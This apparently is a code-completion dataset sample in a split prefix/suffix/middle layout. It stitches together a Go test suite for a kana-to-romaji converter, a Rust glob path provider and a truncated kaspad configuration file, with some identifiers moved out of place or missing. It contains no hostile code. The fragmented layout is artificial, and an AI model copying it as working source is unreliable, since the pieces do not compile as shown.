}
func TestKDakuten(t *testing.T) {
const want = "gagigugego"
for _, v := range [2]string{"がぎぐげご", "ガギグゲゴ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestS(t *testing.T) {
const want = "sashisuseso"
for _, v := range [2]string{"さしすせそ", "サシスセソ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSDakuten(t *testing.T) {
const want = "zajizuzezo"
for _, v := range [2]string{"ざじずぜぞ", "ザジズゼゾ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestT(t *testing.T) {
const want = "tachitsuteto"
for _, v := range [2]string{"たちつてと", "タチツテト"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestTDakuten(t *testing.T) {
const want = "dajizudedo"
for _, v := range [2]string{"だじづでど", "ダジヅデド"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestN(t *testing.T) {
const want = "naninuneno"
for _, v := range [2]string{"なにぬねの", "ナニヌネノ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestH(t *testing.T) {
const want = "hahifuheho"
for _, v := range [2]string{"はひふへほ", "ハヒフヘホ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestHDakutenB(t *testing.T) {
const want = "babibubebo"
for _, v := range [2]string{"ばびぶべぼ", "バビブベボ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestHDakutenP(t *testing.T) {
const want = "papipupepo"
for _, v := range [2]string{"ぱぴぷぺぽ", "パピプペポ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
|
}
}
func TestM(t *testing.T) {
const want = "mamimumemo"
for _, v := range [2]string{"まみむめも", "マミムメモ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestY(t *testing.T) {
const want = "yayuyo"
for _, v := range [2]string{"やゆよ", "ヤユヨ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestR(t *testing.T) {
const want = "rarirurero"
for _, v := range [2]string{"らりるれろ", "ラリルレロ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestW(t *testing.T) {
const want = "wawiwewo"
for _, v := range [2]string{"わゐゑを", "ワヰヱヲ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonInvalid(t *testing.T) {
const want = "yōon cannot be the first character in a kana block"
input := []string{
"ゃき", "ゅき", "ょき", "ぁき", "ぃき", "ぅき", "ぇき", "ぉき", "ゎき",
"ャキ", "ュキ", "ョキ", "ァキ", "ィキ", "ゥキ", "ェキ", "ォキ", "ヮキ",
}
for _, v := range input {
got, err := KanaToRomaji(v)
assert.Empty(t, got)
assert.EqualError(t, err, want)
}
}
func TestYouonSpecialInvalid(t *testing.T) {
const want = "unrecognised yōon vowel"
input := []string{
"あぃ", "えぃ", "おぃ",
"アィ", "エィ", "オィ",
}
for _, v := range input {
got, err := KanaToRomaji(v)
assert.Empty(t, got)
assert.EqualError(t, err, want)
}
}
func TestYouonI(t *testing.T) {
const want = "ye"
for _, v := range [2]string{"いぇ", "イェ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonU(t *testing.T) {
const want = "wiwe"
for _, v := range [2]string{"うぃうぇ", "ウィウェ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonV(t *testing.T) {
const want = "vyavyuvyovavivuvevo"
for _, v := range [2]string{"ゔゃゔゅゔょゔぁゔぃゔぅゔぇゔぉ", "ヴャヴュヴョヴァヴィヴゥヴェヴォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonK(t *testing.T) {
const want = "kyakyukyokyakyikyukyekyo"
for _, v := range [2]string{"きゃきゅきょきぁきぃきぅきぇきぉ", "キャキュキョキァキィキゥキェキォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonKSpecial(t *testing.T) {
const want = "kakikukekokwaki"
for _, v := range [2]string{"くぁくぃくぅくぇくぉくゎけぃ", "クァクィクゥクェクォクヮケィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonG(t *testing.T) {
const want = "gyagyugyogyagyigyugyegyo"
for _, v := range [2]string{"ぎゃぎゅぎょぎぁぎぃぎぅぎぇぎぉ", "ギャギュギョギァギィギゥギェギォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonGSpecial(t *testing.T) {
const want = "gagigugegogwagi"
for _, v := range [2]string{"ぐぁぐぃぐぅぐぇぐぉぐゎげぃ", "グァグィグゥグェグォグヮゲィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonS(t *testing.T) {
const want = "shashushoshashishushesho"
for _, v := range [2]string{"しゃしゅしょしぁしぃしぅしぇしぉ", "シャシュショシァシィシゥシェシォ"} {
got, _ := KanaToRomaji(v)
assert.Equal(t, want, got)
}
}
func TestYouonSSpecial(t *testing.T) {
const want = "sasisusesoswasi"
for _, v := range [2]string{"すぁすぃすぅすぇすぉすゎせぃ", "スァスィスゥスェスォスヮセィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonZ(t *testing.T) {
const want = "jajujojajijujejo"
for _, v := range [2]string{"じゃじゅじょじぁじぃじぅじぇじぉ", "ジャジュジョジァジィジゥジェジォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonZSpecial(t *testing.T) {
const want = "zazizuzezozwazi"
for _, v := range [2]string{"ずぁずぃずぅずぇずぉずゎぜぃ", "ズァズィズゥズェズォズヮゼィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonT(t *testing.T) {
const want = "chachuchochachichuchecho"
for _, v := range [2]string{"ちゃちゅちょちぁちぃちぅちぇちぉ", "チャチュチョチァチィチゥチェチォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonTSpecial(t *testing.T) {
const want = "tsatsitsutsetsotswatityutu"
for _, v := range [2]string{"つぁつぃつぅつぇつぉつゎてぃてゅとぅ", "ツァツィツゥツェツォツヮティテュトゥ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonDSpecial(t *testing.T) {
const want = "zazizuzezozwadidyudu"
for _, v := range [2]string{"づぁづぃづぅづぇづぉづゎでぃでゅどぅ", "ヅァヅィヅゥヅェヅォヅヮディデュドゥ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonN(t *testing.T) {
const want = "nyanyunyonyanyinyunyenyo"
for _, v := range [2]string{"にゃにゅにょにぁにぃにぅにぇにぉ", "ニャニュニョニァニィニゥニェニォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonNSpecial(t *testing.T) {
const want = "naninunenonwani"
for _, v := range [2]string{"ぬぁぬぃぬぅぬぇぬぉぬゎねぃ", "ヌァヌィヌゥヌェヌォヌヮネィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonH(t *testing.T) {
const want = "hyahyuhyohyahyihyuhyehyo"
for _, v := range [2]string{"ひゃひゅひょひぁひぃひぅひぇひぉ", "ヒャヒュヒョヒァヒィヒゥヒェヒォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonHSpecial(t *testing.T) {
const want = "fafifufefofwafyuhi"
for _, v := range [2]string{"ふぁふぃふぅふぇふぉふゎふゅへぃ", "ファフィフゥフェフォフヮフュヘィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonB(t *testing.T) {
const want = "byabyubyobyabyibyubyebyo"
for _, v := range [2]string{"びゃびゅびょびぁびぃびぅびぇびぉ", "ビャビュビョビァビィビゥビェビォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonBSpecial(t *testing.T) {
const want = "babibubebobwabyubi"
for _, v := range [2]string{"ぶぁぶぃぶぅぶぇぶぉぶゎぶゅべぃ", "ブァブィブゥブェブォブヮブュベィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonP(t *testing.T) {
const want = "pyapyupyopyapyipyupyepyo"
for _, v := range [2]string{"ぴゃぴゅぴょぴぁぴぃぴぅぴぇぴぉ", "ピャピュピョピァピィピゥピェピォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonPSpecial(t *testing.T) {
const want = "papipupepopwapyupi"
for _, v := range [2]string{"ぷぁぷぃぷぅぷぇぷぉぷゎぷゅぺぃ", "プァプィプゥプェプォプヮプュペィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonM(t *testing.T) {
const want = "myamyumyomyamyimyumyemyo"
for _, v := range [2]string{"みゃみゅみょみぁみぃみぅみぇみぉ", "ミャミュミョミァミィミゥミェミォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonMSpecial(t *testing.T) {
const want = "mamimumemomwamyumi"
for _, v := range [2]string{"むぁむぃむぅむぇむぉむゎむゅめぃ", "ムァムィムゥムェムォムヮムュメィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonYSpecial(t *testing.T) {
const want = "yayiyuyeyoywa"
for _, v := range [2]string{"ゆぁゆぃゆぅゆぇゆぉゆゎ", "ユァユィユゥユェユォユヮ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonR(t *testing.T) {
const want = "ryaryuryoryaryiryuryeryo"
for _, v := range [2]string{"りゃりゅりょりぁりぃりぅりぇりぉ", "リャリュリョリァリィリゥリェリォ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonRSpecial(t *testing.T) {
const want = "rarirurerorwaryuri"
for _, v := range [2]string{"るぁるぃるぅるぇるぉるゎるゅれぃ", "ルァルィルゥルェルォルヮルュレィ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestYouonWSpecial(t *testing.T) {
const want = "wa"
for _, v := range [2]string{"わぁ", "ワァ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestPunctuationMark(t *testing.T) {
const want = "jiendo"
got, err := KanaToRomaji("ジ・エンド")
assert.Equal(t, want, got)
assert.Nil(t, err)
}
func TestSokuonInvalid(t *testing.T) {
const want = "sokuon cannot precede a vowel"
input := []string{
"っあ", "っい", "っう", "っえ", "っお",
"ッア", "ッイ", "ッウ", "ッエ", "ッオ",
}
for _, v := range input {
got, err := KanaToRomaji(v)
assert.EqualError(t, err, want)
assert.Empty(t, got)
}
}
func TestSokuon(t *testing.T) {
const want = "nn"
for _, v := range []string{"っん", "ッン"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonK(t *testing.T) {
const want = "kkakkikkukkekko"
for _, v := range []string{"っかっきっくっけっこ", "ッカッキックッケッコ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonG(t *testing.T) {
const want = "ggaggigguggeggo"
for _, v := range []string{"っがっぎっぐっげっご", "ッガッギッグッゲッゴ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonS(t *testing.T) {
const want = "ssasshissussesso"
for _, v := range []string{"っさっしっすっせっそ", "ッサッシッスッセッソ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonZ(t *testing.T) {
const want = "zzajjizzuzzezzo"
for _, v := range []string{"っざっじっずっぜっぞ", "ッザッジッズッゼッゾ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonT(t *testing.T) {
const want = "ttatchittsuttetto"
for _, v := range []string{"ったっちっつってっと", "ッタッチッツッテット"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonD(t *testing.T) {
const want = "ddajjizzuddeddo"
for _, v := range []string{"っだっぢっづっでっど", "ッダッヂッヅッデッド"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonN(t *testing.T) {
const want = "nnanninnunnenno"
for _, v := range []string{"っなっにっぬっねっの", "ッナッニッヌッネッノ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonH(t *testing.T) {
const want = "hhahhiffuhhehho"
for _, v := range []string{"っはっひっふっへっほ", "ッハッヒッフッヘッホ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonB(t *testing.T) {
const want = "bbabbibbubbebbo"
for _, v := range []string{"っばっびっぶっべっぼ", "ッバッビッブッベッボ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonP(t *testing.T) {
const want = "ppappippuppeppo"
for _, v := range []string{"っぱっぴっぷっぺっぽ", "ッパッピップッペッポ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonM(t *testing.T) {
const want = "mmammimmummemmo"
for _, v := range []string{"っまっみっむっめっも", "ッマッミッムッメッモ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonY(t *testing.T) {
const want = "yyayyuyyo"
for _, v := range []string{"っやっゆっよ", "ッヤッユッヨ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonR(t *testing.T) {
const want = "rrarrirrurrerro"
for _, v := range []string{"っらっりっるっれっろ", "ッラッリッルッレッロ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestSokuonW(t *testing.T) {
const want = "wwawwo"
for _, v := range []string{"っわっを", "ッワッヲ"} {
got, err := KanaToRomaji(v)
assert.Equal(t, want, got)
assert.Nil(t, err)
}
}
func TestChouonpuA(t *testing.T) {
input := []inp{
{input: "アー", want: "aa"},
{input: "カーカ", want: "kaaka"},
{input: "キャーカ", want: "kyaaka"},
{input: "ガーカ", want: "gaaka"},
{input: "ギャーカ", want: "gyaaka"},
{input: "サーカ", want: "saaka"},
{input: "シャーカ", want: "shaaka"},
{input: "ザーカ", want: "zaaka"},
{input: "ジャーカ", want: "jaaka"},
{input: "ターカ", want: "taaka"},
{input: "チャーカ", want: "chaaka"},
{input: "ダーカ", want: "daaka"},
{input: "ヂャーカ", want: "jaaka"},
{input: "ナーカ", want: "naaka"},
{input: "ニャーカ", want: "nyaaka"},
{input: "ハーカ", want: "haaka"},
{input: "ヒャーカ", want: "hyaaka"},
{input: "バーカ", want: "baaka"},
{input: "ビャーカ", want: "byaaka"},
{input: "パーカ", want: "paaka"},
{input: "ピャーカ", want: "pyaaka"},
{input: "マーカ", want: "maaka"},
{input: "ミャーカ", want: "myaaka"},
{input: "ヤーカ", want: "yaaka"},
{input: "ラーカ", want: "raaka"},
{input: "リャーカ", want: "ryaaka"},
{input: "ワーカ", want: "waaka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuI(t *testing.T) {
input := []inp{
{input: "イー", want: "ii"},
{input: "キーカ", want: "kiika"},
{input: "キィーカ", want: "kyiika"},
{input: "ギーカ", want: "giika"},
{input: "ギィーカ", want: "gyiika"},
{input: "シーカ", want: "shiika"},
{input: "シィーカ", want: "shiika"},
{input: "ジーカ", want: "jiika"},
{input: "ジィーカ", want: "jiika"},
{input: "チーカ", want: "chiika"},
{input: "チィーカ", want: "chiika"},
{input: "ヂーカ", want: "jiika"},
{input: "ヂィーカ", want: "jiika"},
{input: "ニーカ", want: "niika"},
{input: "ニィーカ", want: "nyiika"},
{input: "ヒーカ", want: "hiika"},
{input: "ヒィーカ", want: "hyiika"},
{input: "ビーカ", want: "biika"},
{input: "ビィーカ", want: "byiika"},
{input: "ピーカ", want: "piika"},
{input: "ピィーカ", want: "pyiika"},
{input: "ミーカ", want: "miika"},
{input: "ミィーカ", want: "myiika"},
{input: "リーカ", want: "riika"},
{input: "リィーカ", want: "ryiika"},
{input: "ヰーカ", want: "wiika"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuU(t *testing.T) {
input := []inp{
{input: "ウー", want: "uu"},
{input: "クーカ", want: "kuuka"},
{input: "キューカ", want: "kyuuka"},
{input: "グーカ", want: "guuka"},
{input: "ギューカ", want: "gyuuka"},
{input: "スーカ", want: "suuka"},
{input: "シューカ", want: "shuuka"},
{input: "ズーカ", want: "zuuka"},
{input: "ジューカ", want: "juuka"},
{input: "ツーカ", want: "tsuuka"},
{input: "チューカ", want: "chuuka"},
{input: "ヅーカ", want: "zuuka"},
{input: "ヂューカ", want: "juuka"},
{input: "ヌーカ", want: "nuuka"},
{input: "ニューカ", want: "nyuuka"},
{input: "フーカ", want: "fuuka"},
{input: "ヒューカ", want: "hyuuka"},
{input: "ブーカ", want: "buuka"},
{input: "ビューカ", want: "byuuka"},
{input: "プーカ", want: "puuka"},
{input: "ピューカ", want: "pyuuka"},
{input: "ムーカ", want: "muuka"},
{input: "ミューカ", want: "myuuka"},
{input: "ユーカ", want: "yuuka"},
{input: "ルーカ", want: "ruuka"},
{input: "リューカ", want: "ryuuka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuE(t *testing.T) {
input := []inp{
{input: "エー", want: "ee"},
{input: "ケーカ", want: "keeka"},
{input: "キェーカ", want: "kyeeka"},
{input: "ゲーカ", want: "geeka"},
{input: "ギェーカ", want: "gyeeka"},
{input: "セーカ", want: "seeka"},
{input: "シェーカ", want: "sheeka"},
{input: "ゼーカ", want: "zeeka"},
{input: "ジェーカ", want: "jeeka"},
{input: "テーカ", want: "teeka"},
{input: "チェーカ", want: "cheeka"},
{input: "デーカ", want: "deeka"},
{input: "ヂェーカ", want: "jeeka"},
{input: "ネーカ", want: "neeka"},
{input: "ニェーカ", want: "nyeeka"},
{input: "ヘーカ", want: "heeka"},
{input: "ヒェーカ", want: "hyeeka"},
{input: "ベーカ", want: "beeka"},
{input: "ビェーカ", want: "byeeka"},
{input: "ペーカ", want: "peeka"},
{input: "ピェーカ", want: "pyeeka"},
{input: "メーカ", want: "meeka"},
{input: "ミェーカ", want: "myeeka"},
{input: "レーカ", want: "reeka"},
{input: "リェーカ", want: "ryeeka"},
{input: "ヱーカ", want: "weeka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestChouonpuO(t *testing.T) {
input := []inp{
{input: "オー", want: "oo"},
{input: "コーカ", want: "kooka"},
{input: "キョーカ", want: "kyooka"},
{input: "ゴーカ", want: "gooka"},
{input: "ギョーカ", want: "gyooka"},
{input: "ソーカ", want: "sooka"},
{input: "ショーカ", want: "shooka"},
{input: "ゾーカ", want: "zooka"},
{input: "ジョーカ", want: "jooka"},
{input: "トーカ", want: "tooka"},
{input: "チョーカ", want: "chooka"},
{input: "ドーカ", want: "dooka"},
{input: "ヂョーカ", want: "jooka"},
{input: "ノーカ", want: "nooka"},
{input: "ニョーカ", want: "nyooka"},
{input: "ホーカ", want: "hooka"},
{input: "ヒョーカ", want: "hyooka"},
{input: "ボーカ", want: "booka"},
{input: "ビョーカ", want: "byooka"},
{input: "ポーカ", want: "pooka"},
{input: "ピョーカ", want: "pyooka"},
{input: "モーカ", want: "mooka"},
{input: "ミョーカ", want: "myooka"},
{input: "ローカ", want: "rooka"},
{input: "リョーカ", want: "ryooka"},
{input: "ヲーカ", want: "wooka"},
}
for _, v := range input {
got, err := KanaToRomaji(v.input)
assert.Equal(t, v.want, got)
assert.Nil(t, err)
}
}
func TestNonKanaCharacters(t *testing.T) {
inputs := []string{
"日本",
"English",
}
for _, input := range inputs {
got, err := KanaToRomaji(input)
assert.Empty(t, got)
assert.NotNil(t, err)
}
}
| |
glob.rs
|
use crate::provider::Provider;
use glob::Pattern;
use std::path::PathBuf;
/// A glob-based path provider
///
/// Provides the paths to the files on the file system that
/// match includes patterns and don't match the exclude patterns
pub struct
|
{
includes: Vec<String>,
excludes: Vec<Pattern>,
}
impl Glob {
/// Create a new [`Glob`]
///
/// Returns `None` if patterns aren't valid
pub fn new(includes: &[PathBuf], excludes: &[PathBuf]) -> Option<Self> {
let includes = includes
.iter()
.map(|path| path.to_str().map(ToOwned::to_owned))
.collect::<Option<_>>()?;
let excludes = excludes
.iter()
.map(|path| path.to_str().map(|path| Pattern::new(path).ok()))
.flatten()
.collect::<Option<_>>()?;
Some(Self { includes, excludes })
}
}
impl Provider for Glob {
fn scan(&self) -> Vec<PathBuf> {
self.includes
.iter()
.flat_map(|include| {
glob::glob(include.as_str())
.expect("failed to read flob pattern")
.flat_map(|result| result.ok())
})
.filter(|candidate: &PathBuf| -> bool {
!self.excludes.iter().any(|pattern| {
let s = candidate.to_str().unwrap();
pattern.matches(s)
})
})
.collect()
}
}
|
Glob
|
config.go
|
// Copyright (c) 2013-2017 The btcsuite developers
// Use of this source code is governed by an ISC
// license that can be found in the LICENSE file.
package config
import (
// _ "embed" is necessary for the go:embed feature.
_ "embed"
"fmt"
"net"
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"time"
"github.com/btcsuite/go-socks/socks"
"github.com/jessevdk/go-flags"
"github.com/kaspanet/kaspad/domain/consensus/model/externalapi"
"github.com/kaspanet/kaspad/domain/dagconfig"
"github.com/kaspanet/kaspad/infrastructure/logger"
"github.com/kaspanet/kaspad/util"
"github.com/kaspanet/kaspad/util/network"
"github.com/kaspanet/kaspad/version"
"github.com/pkg/errors"
)
const (
defaultConfigFilename = "kaspad.conf"
defaultLogLevel = "info"
defaultLogDirname = "logs"
defaultLogFilename = "kaspad.log"
defaultErrLogFilename = "kaspad_err.log"
defaultTargetOutboundPeers = 8
defaultMaxInboundPeers = 117
defaultBanDuration = time.Hour * 24
defaultBanThreshold = 100
//DefaultConnectTimeout is the default connection timeout when dialing
DefaultConnectTimeout = time.Second * 30
defaultMaxRPCClients = 10
defaultMaxRPCWebsockets = 25
defaultMaxRPCConcurrentReqs = 20
defaultBlockMaxMass = 10000000
blockMaxMassMin = 1000
blockMaxMassMax = 10000000
defaultMinRelayTxFee = 1e-5 // 1 sompi per byte
defaultMaxOrphanTransactions = 100
//DefaultMaxOrphanTxSize is the default maximum size for an orphan transaction
DefaultMaxOrphanTxSize = 100000
defaultSigCacheMaxSize = 100000
sampleConfigFilename = "sample-kaspad.conf"
defaultMaxUTXOCacheSize = 5000000000
)
var (
// DefaultAppDir is the default home directory for kaspad.
DefaultAppDir = util.AppDir("kaspad", false)
defaultConfigFile = filepath.Join(DefaultAppDir, defaultConfigFilename)
defaultDataDir = filepath.Join(DefaultAppDir)
defaultRPCKeyFile = filepath.Join(DefaultAppDir, "rpc.key")
defaultRPCCertFile = filepath.Join(DefaultAppDir, "rpc.cert")
)
//go:embed sample-kaspad.conf
var sampleConfig string
// RunServiceCommand is only set to a real function on Windows. It is used
// to parse and execute service commands specified via the -s flag.
var RunServiceCommand func(string) error
// Flags defines the configuration options for kaspad.
//
// See loadConfig for details on the configuration load process.
type Flags struct {
ShowVersion bool `short:"V" long:"version" description:"Display version information and exit"`
ConfigFile string `short:"C" long:"configfile" description:"Path to configuration file"`
AppDir string `short:"b" long:"appdir" description:"Directory to store data"`
LogDir string `long:"logdir" description:"Directory to log output."`
AddPeers []string `short:"a" long:"addpeer" description:"Add a peer to connect with at startup"`
ConnectPeers []string `long:"connect" description:"Connect only to the specified peers at startup"`
DisableListen bool `long:"nolisten" description:"Disable listening for incoming connections -- NOTE: Listening is automatically disabled if the --connect or --proxy options are used without also specifying listen interfaces via --listen"`
Listeners []string `long:"listen" description:"Add an interface/port to listen for connections (default all interfaces port: 16111, testnet: 16211)"`
TargetOutboundPeers int `long:"outpeers" description:"Target number of outbound peers"`
MaxInboundPeers int `long:"maxinpeers" description:"Max number of inbound peers"`
EnableBanning bool `long:"enablebanning" description:"Enable banning of misbehaving peers"`
BanDuration time.Duration `long:"banduration" description:"How long to ban misbehaving peers. Valid time units are {s, m, h}. Minimum 1 second"`
BanThreshold uint32 `long:"banthreshold" description:"Maximum allowed ban score before disconnecting and banning misbehaving peers."`
Whitelists []string `long:"whitelist" description:"Add an IP network or IP that will not be banned. (eg. 192.168.1.0/24 or ::1)"`
RPCListeners []string `long:"rpclisten" description:"Add an interface/port to listen for RPC connections (default port: 16110, testnet: 16210)"`
RPCCert string `long:"rpccert" description:"File containing the certificate file"`
RPCKey string `long:"rpckey" description:"File containing the certificate key"`
RPCMaxClients int `long:"rpcmaxclients" description:"Max number of RPC clients for standard connections"`
RPCMaxWebsockets int `long:"rpcmaxwebsockets" description:"Max number of RPC websocket connections"`
RPCMaxConcurrentReqs int `long:"rpcmaxconcurrentreqs" description:"Max number of concurrent RPC requests that may be processed concurrently"`
DisableRPC bool `long:"norpc" description:"Disable built-in RPC server"`
DisableDNSSeed bool `long:"nodnsseed" description:"Disable DNS seeding for peers"`
DNSSeed string `long:"dnsseed" description:"Override DNS seeds with specified hostname (Only 1 hostname allowed)"`
GRPCSeed string `long:"grpcseed" description:"Hostname of gRPC server for seeding peers"`
ExternalIPs []string `long:"externalip" description:"Add an ip to the list of local addresses we claim to listen on to peers"`
Proxy string `long:"proxy" description:"Connect via SOCKS5 proxy (eg. 127.0.0.1:9050)"`
ProxyUser string `long:"proxyuser" description:"Username for proxy server"`
ProxyPass string `long:"proxypass" default-mask:"-" description:"Password for proxy server"`
DbType string `long:"dbtype" description:"Database backend to use for the Block DAG"`
Profile string `long:"profile" description:"Enable HTTP profiling on given port -- NOTE port must be between 1024 and 65536"`
LogLevel string `short:"d" long:"loglevel" description:"Logging level for all subsystems {trace, debug, info, warn, error, critical} -- You may also specify <subsystem>=<level>,<subsystem2>=<level>,... to set the log level for individual subsystems -- Use show to list available subsystems"`
Upnp bool `long:"upnp" description:"Use UPnP to map our listening port outside of NAT"`
MinRelayTxFee float64 `long:"minrelaytxfee" description:"The minimum transaction fee in KAS/kB to be considered a non-zero fee."`
MaxOrphanTxs uint64 `long:"maxorphantx" description:"Max number of orphan transactions to keep in memory"`
BlockMaxMass uint64 `long:"blockmaxmass" description:"Maximum transaction mass to be used when creating a block"`
UserAgentComments []string `long:"uacomment" description:"Comment to add to the user agent -- See BIP 14 for more information."`
NoPeerBloomFilters bool `long:"nopeerbloomfilters" description:"Disable bloom filtering support"`
SigCacheMaxSize uint `long:"sigcachemaxsize" description:"The maximum number of entries in the signature verification cache"`
BlocksOnly bool `long:"blocksonly" description:"Do not accept transactions from remote peers."`
RelayNonStd bool `long:"relaynonstd" description:"Relay non-standard transactions regardless of the default settings for the active network."`
RejectNonStd bool `long:"rejectnonstd" description:"Reject non-standard transactions regardless of the default settings for the active network."`
ResetDatabase bool `long:"reset-db" description:"Reset database before starting node. It's needed when switching between subnetworks."`
MaxUTXOCacheSize uint64 `long:"maxutxocachesize" description:"Max size of loaded UTXO into ram from the disk in bytes"`
UTXOIndex bool `long:"utxoindex" description:"Enable the UTXO index"`
IsArchivalNode bool `long:"archival" description:"Run as an archival node: don't delete old block data when moving the pruning point (Warning: heavy disk usage)'"`
AllowSubmitBlockWhenNotSynced bool `long:"allow-submit-block-when-not-synced" hidden:"true" description:"Allow the node to accept blocks from RPC while not synced (this flag is mainly used for testing)"`
EnableSanityCheckPruningUTXOSet bool `long:"enable-sanity-check-pruning-utxo" hidden:"true" description:"When moving the pruning point - check that the utxo set matches the utxo commitment"`
NetworkFlags
ServiceOptions *ServiceOptions
}
// Config defines the configuration options for kaspad.
//
// See loadConfig for details on the configuration load process.
type Config struct {
*Flags
Lookup func(string) ([]net.IP, error)
Dial func(string, string, time.Duration) (net.Conn, error)
MiningAddrs []util.Address
MinRelayTxFee util.Amount
Whitelists []*net.IPNet
SubnetworkID *externalapi.DomainSubnetworkID // nil in full nodes
}
// ServiceOptions defines the configuration options for the daemon as a service on
// Windows.
type ServiceOptions struct {
ServiceCommand string `short:"s" long:"service" description:"Service command {install, remove, start, stop}"`
}
// cleanAndExpandPath expands environment variables and leading ~ in the
// passed path, cleans the result, and returns it.
func
|
(path string) string {
